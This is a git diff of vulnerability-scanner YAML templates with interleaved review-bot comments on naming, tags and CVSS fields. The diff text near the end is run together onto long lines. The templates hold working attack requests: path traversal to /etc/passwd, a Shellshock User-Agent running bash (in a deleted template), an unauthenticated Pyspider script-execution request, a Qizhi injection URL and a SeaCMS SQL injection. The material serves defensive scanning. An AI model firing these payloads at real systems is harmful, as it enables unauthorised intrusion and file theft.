+ name: OptiLink ONT1GEW GPON Remote Code Execution
 author: gy741
 severity: critical
- description: vulnerabilities in the web-based management interface of OptiLink could allow an authenticated, remote attacker to perform command injection attacks against an affected device.
+ description: OptiLink is susceptible to remote code execution vulnerabilities which could allow an authenticated, remote attacker to perform command injection attacks against an affected device.
 reference:
 - https://packetstormsecurity.com/files/162993/OptiLink-ONT1GEW-GPON-2.1.11_X101-Remote-Code-Execution.html
 - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
- tags: optiLink,rce,oast
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10.0
+ cwe-id: CWE-77
+ tags: optiLink,rce,oast,mirai
 requests:
 - raw:
@@ -29,3 +33,5 @@ requests:
 part: interactsh_protocol # Confirms the HTTP Interaction
 words:
 - "http"
+
+# Enhanced by mp on 2022/04/01
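Review bot: In optilink-ont1gew-gpon-rce the added `cvss-metrics` vector declares `PR:N` (no privileges required) while the rewritten description on the same hunk still says "an authenticated, remote attacker", and the old name's "Pre-Auth" was dropped, so the template now contradicts itself about whether a session is needed. Settle it from the references before merging: if the injection is unauthenticated, change the description to `which could allow an unauthenticated, remote attacker to perform command injection`; if it requires login, use `PR:L` and recompute `cvss-score`. The trailing `# Enhanced by mp` marker in the second hunk does not record what was verified, so a one-line note on which it was would help the next reviewer.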
diff --git a/vulnerabilities/other/oracle-fatwire-lfi.yaml b/vulnerabilities/other/oracle-fatwire-lfi.yaml
new file mode 100644
index 0000000000..6858a74129
--- /dev/null
+++ b/vulnerabilities/other/oracle-fatwire-lfi.yaml
@@ -0,0 +1,26 @@
+id: oracle-fatwire-lfi
+
+info:
+ name: Oracle Fatwire 6.3 - Path Traversal
+ author: Bernardo Rodrigues @bernardofsr
+ severity: critical
+ description: Oracle Fatwire 6.3 suffers from a path traversal vulnerability in the getSurvey.jsp endpoint
+ reference:
+ - https://www.exploit-db.com/exploits/50167
+ tags: lfi,oracle,fatwire
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
diff --git a/vulnerabilities/other/otobo-open-redirect.yaml b/vulnerabilities/other/otobo-open-redirect.yaml
new file mode 100644
index 0000000000..f18da7474c
--- /dev/null
+++ b/vulnerabilities/other/otobo-open-redirect.yaml
@@ -0,0 +1,22 @@
+id: otobo-open-redirect
+
+info:
+ name: Open Redirect in Otobo
+ author: 0x_Akoko
+ severity: medium
+ description: There is a open redirect vulnerability in Otobo
+ reference:
+ - https://huntr.dev/bounties/de64ac71-9d06-47cb-b643-891db02f2a1f/
+ - https://github.com/rotheross/otobo
+ tags: redirect,otobo
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/otobo/index.pl?Action=ExternalURLJump;URL=http://www.example.com'
+
+ matchers:
+ - type: regex
+ part: header
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/vulnerabilities/other/pacsone-server-lfi.yaml b/vulnerabilities/other/pacsone-server-lfi.yaml
new file mode 100644
index 0000000000..9ad5ecf688
--- /dev/null
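Review bot: The otobo-open-redirect description `There is a open redirect vulnerability in Otobo` has an article error and no terminal punctuation, and the name `Open Redirect in Otobo` departs from the `<Product> - <Issue>` form the other new templates in this commit use (oracle-fatwire-lfi, pollbot-redirect). Suggested: `name: Otobo - Open Redirect` and `description: Otobo is vulnerable to an open redirect via the ExternalURLJump action of index.pl.` The oracle-fatwire-lfi description in the preceding hunk likewise lacks a closing period.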
+++ b/vulnerabilities/other/pacsone-server-lfi.yaml
@@ -0,0 +1,24 @@
+id: pacsone-server-lfi
+
+info:
+ name: PACSOne Server 6.6.2 DICOM Web Viewer Directory Trasversal
+ author: 0x_Akoko
+ severity: high
+ reference:
+ - https://cxsecurity.com/issue/WLB-2018010303
+ tags: pacsone,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/vulnerabilities/other/parentlink-xss.yaml b/vulnerabilities/other/parentlink-xss.yaml
index 2f112349cf..9b9766f693 100644
--- a/vulnerabilities/other/parentlink-xss.yaml
+++ b/vulnerabilities/other/parentlink-xss.yaml
@@ -4,8 +4,9 @@ info:
 name: Blackboard ParentLink Reflected XSS
 author: r3naissance
 severity: medium
+ reference:
+ - https://help.blackboard.com/Community_Engagement/Administrator/Release_Notes
 tags: blackboard,parentlink,xss
- reference: https://help.blackboard.com/Community_Engagement/Administrator/Release_Notes
 requests:
 - method: GET
diff --git a/vulnerabilities/other/pbootcms-database-file-download.yaml b/vulnerabilities/other/pbootcms-database-file-download.yaml
new file mode 100644
index 0000000000..9781cd9421
--- /dev/null
+++ b/vulnerabilities/other/pbootcms-database-file-download.yaml
@@ -0,0 +1,29 @@
+id: pbootcms-database-file-download
+
+info:
+ name: PbootCMS v2.0.7 - pbootcms.db File Download
+ author: ritikchaddha
+ severity: high
+ reference:
+ - https://xz.aliyun.com/t/7628
+ - https://www.cnblogs.com/0daybug/p/12786036.html
+ tags: pbootcms,db,exposure,database,sqlite
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/data/pbootcms.db"
+
+ max-size: 20000
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "PbootCMS"
+ - "SQLite format 3"
+ condition: and
+
+ - type: status
+ status:
+ - 200
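Review bot: pacsone-server-lfi ships with a typo in its name (`Directory Trasversal` → `Directory Traversal`) and no `description:` at all, and its body regex `"root:[x*]:0:0"` lacks the trailing colon that the rest of this commit is deliberately adding to sibling templates (`"root:.*:0:0:"` in pmb-directory-traversal, processmaker-lfi, seowon-router-rce and others); sl-studio-lfi later in the diff has the same `root:[x*]:0:0` form. Aligning both on `- "root:.*:0:0:"` keeps one convention across the repo. The missing `description:` also applies to pbootcms-database-file-download (this line), pyspider-unauthorized-access, qizhi-fortressaircraft-unauth, seacms-sqli, sl-studio-lfi and sponip-network-system-ping-rce; a one-sentence description of what the request exposes is the minimum the `info` block should carry.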
diff --git a/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml b/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml
index f1d82689fa..83336dff9f 100644
--- a/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml
+++ b/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml
@@ -4,7 +4,7 @@ info:
 name: PDF Signer v3.0 - SSTI to RCE via CSRF Cookie
 author: madrobot
 severity: high
- tags: ssti,rce
+ tags: ssti,rce,csrf
 requests:
 - method: GET
diff --git a/vulnerabilities/other/php-timeclock-xss.yaml b/vulnerabilities/other/php-timeclock-xss.yaml
index 55686517b4..4da922addd 100644
--- a/vulnerabilities/other/php-timeclock-xss.yaml
+++ b/vulnerabilities/other/php-timeclock-xss.yaml
@@ -5,7 +5,8 @@ info:
 author: pikpikcu
 severity: medium
 description: PHP Timeclock version 1.04 (and prior) Cross-Site Scripting vulnerabilities
- reference: https://www.exploit-db.com/exploits/49853
+ reference:
+ - https://www.exploit-db.com/exploits/49853
 tags: xss,php,timeclock
 requests:
diff --git a/vulnerabilities/other/php-zerodium-backdoor-rce.yaml b/vulnerabilities/other/php-zerodium-backdoor-rce.yaml
index a257806c57..180d517472 100644
--- a/vulnerabilities/other/php-zerodium-backdoor-rce.yaml
+++ b/vulnerabilities/other/php-zerodium-backdoor-rce.yaml
@@ -3,9 +3,10 @@ id: php-zerodium-backdoor-rce
 info:
 name: PHP Zerodium Backdoor RCE
 author: dhiyaneshDk
- description: A backdoor has been introduced into PHP, dubbed 'zerodiumvar_dump', the backdoor allowed the execution of arbitrary PHP code.
- reference: https://news-web.php.net/php.internals/113838
 severity: critical
+ description: A backdoor has been introduced into PHP, dubbed 'zerodiumvar_dump', the backdoor allowed the execution of arbitrary PHP code.
+ reference:
+ - https://news-web.php.net/php.internals/113838
 tags: php,backdoor
 requests:
diff --git a/vulnerabilities/other/phpwiki-lfi.yaml b/vulnerabilities/other/phpwiki-lfi.yaml
index 0d0a84e034..dda2c1fdb7 100644
--- a/vulnerabilities/other/phpwiki-lfi.yaml
+++ b/vulnerabilities/other/phpwiki-lfi.yaml
@@ -5,8 +5,9 @@ info:
 author: 0x_Akoko
 severity: high
 description: A vulnerability in phpwiki allows remote unauthenticated attackers to include and return the content of locally stored files via the 'index.php' endpoint.
- reference: https://www.exploit-db.com/exploits/38027
- tags: phpwiki,lfi
+ reference:
+ - https://www.exploit-db.com/exploits/38027
+ tags: phpwiki,lfi,xss
 requests:
 - method: GET
diff --git a/vulnerabilities/other/pmb-directory-traversal.yaml b/vulnerabilities/other/pmb-directory-traversal.yaml
index 927daf9a9f..69934ef8a1 100644
--- a/vulnerabilities/other/pmb-directory-traversal.yaml
+++ b/vulnerabilities/other/pmb-directory-traversal.yaml
@@ -1,14 +1,14 @@
 id: pmb-directory-traversal
 info:
- name: PMB 5.6 Directory Traversal
+ name: PMB 5.6 - Arbitrary File Retrieval
 author: geeknik
 severity: medium
- description: The PMB Gif Image is not sanitizing the content of the 'chemin' parameter, this can in turn be used to a Local File Disclosure.
- reference: https://packetstormsecurity.com/files/160072/PMB-5.6-Local-File-Disclosure-Directory-Traversal.html
+ description: The PMB Gif Image is not sanitizing the content of the 'chemin' parameter, wchi can be used for local file retrieval.
+ reference:
+ - https://packetstormsecurity.com/files/160072/PMB-5.6-Local-File-Disclosure-Directory-Traversal.html
 tags: lfi
-
 requests:
 - method: GET
 path:
@@ -20,7 +20,7 @@ requests:
 matchers:
 - type: regex
 regex:
- - "root:.*:0:0"
+ - "root:.*:0:0:"
 - type: status
 status:
diff --git a/vulnerabilities/other/pmb-local-file-disclosure.yaml b/vulnerabilities/other/pmb-local-file-disclosure.yaml
index a62783f871..b67c0f99da 100644
--- a/vulnerabilities/other/pmb-local-file-disclosure.yaml
+++ b/vulnerabilities/other/pmb-local-file-disclosure.yaml
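Review bot: phpwiki-lfi gains an `xss` tag, but its description and its matcher (outside this hunk) describe only local file inclusion via index.php, so the tag either mislabels the template or points at a second issue the metadata never mentions. If the exploit-db reference also covers XSS, say so in the description; otherwise keep `tags: phpwiki,lfi`. Tags drive workflow selection (`-tags xss`), so a stray one makes an LFI check run in XSS-only scans.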
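Review bot: The rewritten pmb-directory-traversal description contains a typo, `wchi`, which should read `which`: `description: The PMB Gif Image is not sanitizing the content of the 'chemin' parameter, which can be used for local file retrieval.` The regex tightening in the second hunk (`"root:.*:0:0:"`) is consistent with the other templates in this commit.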
@@ -1,10 +1,11 @@
 id: pmb-local-file-disclosure
 info:
- name: PMB 5.6 - 'chemin' Local File Disclosure
+ name: PMB 5.6 - getgif.php Arbitrary File Retrieval
 author: dhiyaneshDk
 severity: high
- reference: https://www.exploit-db.com/exploits/49054
+ reference:
+ - https://www.exploit-db.com/exploits/49054
 tags: lfi,pmb
 requests:
diff --git a/vulnerabilities/other/pollbot-redirect.yaml b/vulnerabilities/other/pollbot-redirect.yaml
new file mode 100644
index 0000000000..c11e6df5d3
--- /dev/null
+++ b/vulnerabilities/other/pollbot-redirect.yaml
@@ -0,0 +1,27 @@
+id: pollbot-redirect
+
+info:
+ name: Mozilla Pollbot Services - Unauthenticated Open Redirect
+ author: Evan Rubinstien
+ severity: medium
+ description: Mozilla has a medium severity open redirect vulnerability in pollbot that could be used for social engineering attaks.
+ reference:
+ - https://bugzilla.mozilla.org/show_bug.cgi?id=1753838
+ - https://github.com/mozilla/PollBot
+ tags: redirect,mozilla,pollbot
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/%0A/example.com/'
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: header
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+
+ - type: status
+ status:
+ - 301
diff --git a/vulnerabilities/other/powercreator-cms-rce.yaml b/vulnerabilities/other/powercreator-cms-rce.yaml
index 629eb80d17..3d96d4b8fe 100644
--- a/vulnerabilities/other/powercreator-cms-rce.yaml
+++ b/vulnerabilities/other/powercreator-cms-rce.yaml
@@ -4,7 +4,8 @@ info:
 name: PowerCreator CMS RCE
 author: pikpikcu
 severity: critical
- reference: https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/PowerCreatorCms/PowerCreatorCms%E4%BB%BB%E6%84%8F%E4%B8%8A%E4%BC%A0/
+ reference:
+ - https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/PowerCreatorCms/PowerCreatorCms%E4%BB%BB%E6%84%8F%E4%B8%8A%E4%BC%A0/
 tags: rce,powercreator
 requests:
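Review bot: The pollbot-redirect description misspells `attaks` and restates the severity that is already a field: `description: Mozilla PollBot contains an open redirect that could be used for social engineering attacks.` is shorter and correct. The status matcher is pinned to `301` only; the sibling otobo-open-redirect template relies on the Location header alone, so if PollBot can answer with a 302 on some code paths this check misses it — confirm against the Bugzilla reference and either widen `status` or note in a comment why 301 is the only expected code.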
diff --git a/vulnerabilities/other/processmaker-lfi.yaml b/vulnerabilities/other/processmaker-lfi.yaml
index 2aecb1c745..5645ae5556 100644
--- a/vulnerabilities/other/processmaker-lfi.yaml
+++ b/vulnerabilities/other/processmaker-lfi.yaml
@@ -21,7 +21,7 @@ requests:
 - type: regex
 regex:
- - "root:.*:0:0"
+ - "root:.*:0:0:"
 - type: status
 status:
diff --git a/vulnerabilities/other/pyspider-unauthorized-access.yaml b/vulnerabilities/other/pyspider-unauthorized-access.yaml
new file mode 100644
index 0000000000..5a32bf5506
--- /dev/null
+++ b/vulnerabilities/other/pyspider-unauthorized-access.yaml
@@ -0,0 +1,31 @@
+id: pyspider-unauthorized-access
+
+info:
+ name: Pyspider Unauthorized Access
+ author: ritikchaddha
+ severity: high
+ reference:
+ - https://github.com/ianxtianxt/Pyspider-webui-poc
+ tags: pyspider,unauth
+
+requests:
+ - raw:
+ - |
+ POST /debug/pyspidervulntest/run HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ webdav_mode=false&script=from+pyspider.libs.base_handler+import+*%0Aclass+Handler(BaseHandler)%3A%0A++++def+on_start(self)%3A%0A++++++++print(str(452345672+%2B+567890765))&task=%7B%0A++%22process%22%3A+%7B%0A++++%22callback%22%3A+%22on_start%22%0A++%7D%2C%0A++%22project%22%3A+%22pyspidervulntest%22%2C%0A++%22taskid%22%3A+%22data%3A%2Con_start%22%2C%0A++%22url%22%3A+%22data%3A%2Con_start%22%0A%7D
+
+ redirects: true
+ max-redirects: 2
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "1020236437"
+
+ - type: status
+ status:
+ - 200
diff --git a/vulnerabilities/other/qcubed-xss.yaml b/vulnerabilities/other/qcubed-xss.yaml
index 420879092a..288d0ba81d 100644
--- a/vulnerabilities/other/qcubed-xss.yaml
+++ b/vulnerabilities/other/qcubed-xss.yaml
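Review bot: In pyspider-unauthorized-access the expected body word `"1020236437"` is a bare magic number; it is the sum of the two operands the submitted script prints (452345672 + 567890765), but nothing in the template says so, and anyone who later edits one operand will silently break the matcher. Annotate it inline: `- "1020236437"  # 452345672 + 567890765, printed by the on_start() in the script parameter`. A `description:` stating that the debug run endpoint accepts and executes scripts without authentication is also missing from `info`.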
@@ -5,7 +5,8 @@ info:
 author: pikpikcu
 severity: medium
 description: A vulnerability in Qcubed allows remote attackers to inject arbitrary Javascript via the '/assets/php/_devtools/installer/step_2.php' endpoint and the 'installation_path' parameter.
- reference: https://github.com/qcubed/qcubed/issues/1230
+ reference:
+ - https://github.com/qcubed/qcubed/issues/1230
 tags: xss,qcubed
 requests:
diff --git a/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml b/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml
index dea9993e30..0dc5ff5f59 100644
--- a/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml
+++ b/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml
@@ -4,7 +4,8 @@ info:
 name: Qi'anxin Netkang Next Generation Firewall RCE
 author: pikpikcu
 severity: critical
- reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
+ reference:
+ - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
 tags: rce
 requests:
@@ -23,7 +24,7 @@ requests:
 matchers:
 - type: regex
 regex:
- - "root:.*:0:0"
+ - "root:.*:0:0:"
 part: body
 - type: status
diff --git a/vulnerabilities/other/qihang-media-disclosure.yaml b/vulnerabilities/other/qihang-media-disclosure.yaml
index 4bc2973454..aef7fffd30 100644
--- a/vulnerabilities/other/qihang-media-disclosure.yaml
+++ b/vulnerabilities/other/qihang-media-disclosure.yaml
@@ -4,8 +4,10 @@ info:
 name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 - Cleartext Credentials Disclosure
 author: gy741
 severity: critical
- description: The application suffers from clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml and obtain administrative login information that allows for a successful authentication bypass attack.
- reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php
+ description: The application suffers from clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml
+ and obtain administrative login information that allows for a successful authentication bypass attack.
+ reference:
+ - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php
 tags: qihang,exposure
 requests:
diff --git a/vulnerabilities/other/qihang-media-lfi.yaml b/vulnerabilities/other/qihang-media-lfi.yaml
index 42e4aaed79..ea6db6c683 100644
--- a/vulnerabilities/other/qihang-media-lfi.yaml
+++ b/vulnerabilities/other/qihang-media-lfi.yaml
@@ -1,12 +1,18 @@
 id: qihang-media-lfi
 info:
- name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Arbitrary File Disclosure Vulnerability
+ name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 - Arbitrary File Disclosure
 author: gy741
 severity: high
- description: The QiHang Media Web application suffers from an unauthenticated file disclosure vulnerability when input passed thru the filename parameter when using the download action or thru path parameter when using the getAll action is not properly verified before being used. This can be exploited to disclose contents of files and directories from local resources.
- reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5581.php
- tags: qihang,lfi
+ description: The QiHang Media Web application suffers from an unauthenticated file disclosure vulnerability when input passed thru the filename parameter when using the download action or thru path parameter when
+ using the getAll action is not properly verified before being used. This can be exploited to disclose contents of files and directories from local resources.
+ reference:
+ - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5581.php
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 8.6
+ cwe-id: CWE-22
+ tags: qihang,lfi,disclosure
 requests:
 - raw:
@@ -33,3 +39,5 @@ requests:
 - type: status
 status:
 - 200
+
+# Enhanced by mp on 2022/04/20
diff --git a/vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml b/vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml
new file mode 100644
index 0000000000..a633e9ab50
--- /dev/null
+++ b/vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml
@@ -0,0 +1,28 @@
+id: qizhi-fortressaircraft-unauth
+
+info:
+ name: Qizhi Fortressaircraft Unauthorized Access
+ author: ritikchaddha
+ severity: high
+ reference:
+ - https://mp.weixin.qq.com/s/FjMRJfCqmXfwPzGYq5Vhkw
+ tags: qizhi,fortressaircraft,unauth
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "错误的id"
+ - "审计管理员"
+ - "事件审计"
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/vulnerabilities/other/rce-shellshock-user-agent.yaml b/vulnerabilities/other/rce-shellshock-user-agent.yaml
deleted file mode 100644
index 03aef64b1d..0000000000
--- a/vulnerabilities/other/rce-shellshock-user-agent.yaml
+++ /dev/null
@@ -1,21 +0,0 @@
-id: rce-user-agent-shell-shock
-
-info:
- name: Remote Code Execution Via (User-Agent)
- author: 0xelkomy
- severity: high
- tags: shellshock,rce
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/cgi-bin/status"
-
- headers:
- User-Agent: "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'"
-
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0"
- part: body
\ No newline at end of file
diff --git a/vulnerabilities/other/rconfig-rce.yaml b/vulnerabilities/other/rconfig-rce.yaml
index 0d32e296d5..a4611b31a5 100644
--- a/vulnerabilities/other/rconfig-rce.yaml
+++ b/vulnerabilities/other/rconfig-rce.yaml
@@ -4,11 +4,11 @@ info:
 name: rConfig 3.9.5 - Remote Code Execution
 author: dwisiswant0
 severity: high
- tags: rconfig,rce
 description: A vulnerability in rConfig allows remote attackers to execute arbitrary code on the remote installation by accessing the 'userprocess.php' endpoint.
 reference:
 - https://www.rconfig.com/downloads/rconfig-3.9.5.zip
 - https://www.exploit-db.com/exploits/48878
+ tags: rconfig,rce
 requests:
 - raw:
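Review bot: The three matcher words in qizhi-fortressaircraft-unauth are Chinese UI strings with no indication of their meaning, so a maintainer who does not read Chinese cannot judge whether the `condition: and` set is specific enough or spot a false positive; add inline comments such as `- "错误的id"  # "wrong id"`, `- "审计管理员"  # "audit administrator"`, `- "事件审计"  # "event audit"`. The `info` block also has no `description:`; one sentence saying that the audit detail view is reachable without authentication would do. The name would be clearer with the vendor's product name rather than the literal `Fortressaircraft` transliteration if the reference gives one.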
diff --git a/vulnerabilities/other/resin-cnnvd-200705-315.yaml b/vulnerabilities/other/resin-cnnvd-200705-315.yaml index 8cb1cfac33..6f6923a459 100644 --- a/vulnerabilities/other/resin-cnnvd-200705-315.yaml +++ b/vulnerabilities/other/resin-cnnvd-200705-315.yaml @@ -1,4 +1,5 @@ id: resin-cnnvd-200705-315 + info: name: Caucho Resin Information Disclosure author: princechaddha diff --git a/vulnerabilities/other/resin-inputfile-fileread.yaml b/vulnerabilities/other/resin-inputfile-fileread.yaml index ec2b937c94..37e1be70b9 100644 --- a/vulnerabilities/other/resin-inputfile-fileread.yaml +++ b/vulnerabilities/other/resin-inputfile-fileread.yaml @@ -1,11 +1,13 @@ id: resin-inputfile-fileread + info: name: Caucho Resin LFR author: princechaddha severity: high description: A vulnerability in Caucho Resin allows remote unauthenticated users to utilize the 'inputFile' variable to include the content of locally stored files and disclose their content. + reference: + - https://blkstone.github.io/2017/10/30/resin-attack-vectors/ tags: resin,caucho,lfr - reference: https://blkstone.github.io/2017/10/30/resin-attack-vectors/ requests: - method: GET diff --git a/vulnerabilities/other/resin-viewfile-lfr.yaml b/vulnerabilities/other/resin-viewfile-lfr.yaml index 27b8d5798e..810d40509c 100644 --- a/vulnerabilities/other/resin-viewfile-lfr.yaml +++ b/vulnerabilities/other/resin-viewfile-lfr.yaml 
@@ -1,9 +1,11 @@ id: resin-viewfile-lfr + info: name: Caucho Resin LFR author: princechaddha severity: high - description: There is an input verification vulnerability in the implementation of a certain CGI program in Resin. A remote attacker may use this vulnerability to read any files in the home directory of the Web, including JSP source code or class files. + description: There is an input verification vulnerability in the implementation of a certain CGI program in Resin. A remote attacker may use this vulnerability to read any files in the home directory of the Web, + including JSP source code or class files. reference: - http://0day5.com/archives/1173/ - https://www.cnvd.org.cn/flaw/show/CNVD-2006-3205 diff --git a/vulnerabilities/other/rockmongo-xss.yaml b/vulnerabilities/other/rockmongo-xss.yaml index e4395968ad..a44e456d52 100644 --- a/vulnerabilities/other/rockmongo-xss.yaml +++ b/vulnerabilities/other/rockmongo-xss.yaml @@ -5,7 +5,8 @@ info: author: pikpikcu severity: medium description: A vulnerability in RockMongo allows attackers to inject arbitrary javascript into the response returned by the application. - reference: https://packetstormsecurity.com/files/136658/RockMongo-1.1.8-Cross-Site-Request-Forgery-Cross-Site-Scripting.html + reference: + - https://packetstormsecurity.com/files/136658/RockMongo-1.1.8-Cross-Site-Request-Forgery-Cross-Site-Scripting.html tags: rockmongo,xss requests: diff --git a/vulnerabilities/other/sangfor-edr-auth-bypass.yaml b/vulnerabilities/other/sangfor-edr-auth-bypass.yaml index 2e4aa14045..43abcf1ad7 100644 --- a/vulnerabilities/other/sangfor-edr-auth-bypass.yaml +++ b/vulnerabilities/other/sangfor-edr-auth-bypass.yaml 
@@ -1,10 +1,12 @@ id: sangfor-edr-auth-bypass + info: name: Sangfor EDR Authentication Bypass author: princechaddha severity: high - description: A vulnerability in Sangfor EDR allows remote attackers to access the system with 'admin' privileges by accessing the login page directly using a provided username rather than going through the login screen without providing a username. - tags: sangfor,auth-bypass + description: A vulnerability in Sangfor EDR allows remote attackers to access the system with 'admin' privileges by accessing the login page directly using a provided username rather than going through the login + screen without providing a username. + tags: sangfor,auth-bypass,login requests: - method: GET diff --git a/vulnerabilities/other/sangfor-edr-rce.yaml b/vulnerabilities/other/sangfor-edr-rce.yaml index 997f107b6f..309c0580be 100644 --- a/vulnerabilities/other/sangfor-edr-rce.yaml +++ b/vulnerabilities/other/sangfor-edr-rce.yaml @@ -5,8 +5,9 @@ info: author: pikpikcu severity: critical description: A vulnerability in Sangfor EDR product allows remote unauthenticated users to cause the product to execute arbitrary commands. - reference: https://www.cnblogs.com/0day-li/p/13650452.html - tags: rce + reference: + - https://www.cnblogs.com/0day-li/p/13650452.html + tags: rce,sangfor requests: - method: POST @@ -21,7 +22,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" part: body - type: status status: diff --git a/vulnerabilities/other/sap-redirect.yaml b/vulnerabilities/other/sap-redirect.yaml index e970788ccf..906e0b928c 100644 --- a/vulnerabilities/other/sap-redirect.yaml +++ b/vulnerabilities/other/sap-redirect.yaml @@ -7,7 +7,6 @@ info: description: A vulnerability in SAP's 'logoff' endpoint allows attackers to redirect victims to their URL of choice. tags: redirect,sap - requests: - method: GET 
diff --git a/vulnerabilities/other/sar2html-rce.yaml b/vulnerabilities/other/sar2html-rce.yaml index 24a127592a..d8d654126f 100644 --- a/vulnerabilities/other/sar2html-rce.yaml +++ b/vulnerabilities/other/sar2html-rce.yaml @@ -4,8 +4,10 @@ info: name: sar2html 3.2.1 - 'plot' Remote Code Execution author: gy741 severity: critical - description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a command injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system. - reference: https://www.exploit-db.com/exploits/49344 + description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a command injection flaw in the index.php script. By sending specially-crafted commands, an attacker could + exploit this vulnerability to execute arbitrary commands on the system. + reference: + - https://www.exploit-db.com/exploits/49344 tags: sar2html,rce,oast requests: diff --git a/vulnerabilities/other/seacms-rce.yaml b/vulnerabilities/other/seacms-rce.yaml index 7f2dbaec18..54d215da6b 100644 --- a/vulnerabilities/other/seacms-rce.yaml +++ b/vulnerabilities/other/seacms-rce.yaml @@ -1,10 +1,12 @@ id: seacms-rce + info: name: SeaCMS V6.4.5 RCE author: pikpikcu severity: high description: A vulnerability in SeaCMS allows remote unauthenticated attackers to execute arbitrary PHP code. - reference: https://mengsec.com/2018/08/06/SeaCMS-v6-45前台代码执行漏洞分析/ + reference: + - https://mengsec.com/2018/08/06/SeaCMS-v6-45前台代码执行漏洞分析/ tags: seacms,rce requests: diff --git a/vulnerabilities/other/seacms-sqli.yaml b/vulnerabilities/other/seacms-sqli.yaml new file mode 100644 index 0000000000..1eb29a5bc1 --- /dev/null +++ b/vulnerabilities/other/seacms-sqli.yaml 
@@ -0,0 +1,27 @@ +id: seacms-sqli + +info: + name: SeaCMS V8.7 SQL Injection + author: ritikchaddha + severity: high + reference: + - https://www.uedbox.com/post/54561/ + tags: seacms,sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27`" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "6f7c6dcbc380aac3bcba1f9fccec991e" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/seowon-router-rce.yaml b/vulnerabilities/other/seowon-router-rce.yaml index 306a4dfa29..527e8bffe9 100644 --- a/vulnerabilities/other/seowon-router-rce.yaml +++ b/vulnerabilities/other/seowon-router-rce.yaml @@ -5,7 +5,8 @@ info: author: gy741 severity: critical description: Execute commands without authentication as admin user, To use it in all versions, we only enter the router ip & Port(if available) in the request The result of the request is visible on the browser page - reference: https://www.exploit-db.com/exploits/50295 + reference: + - https://www.exploit-db.com/exploits/50295 tags: rce,seowon,router,unauth,iot requests: @@ 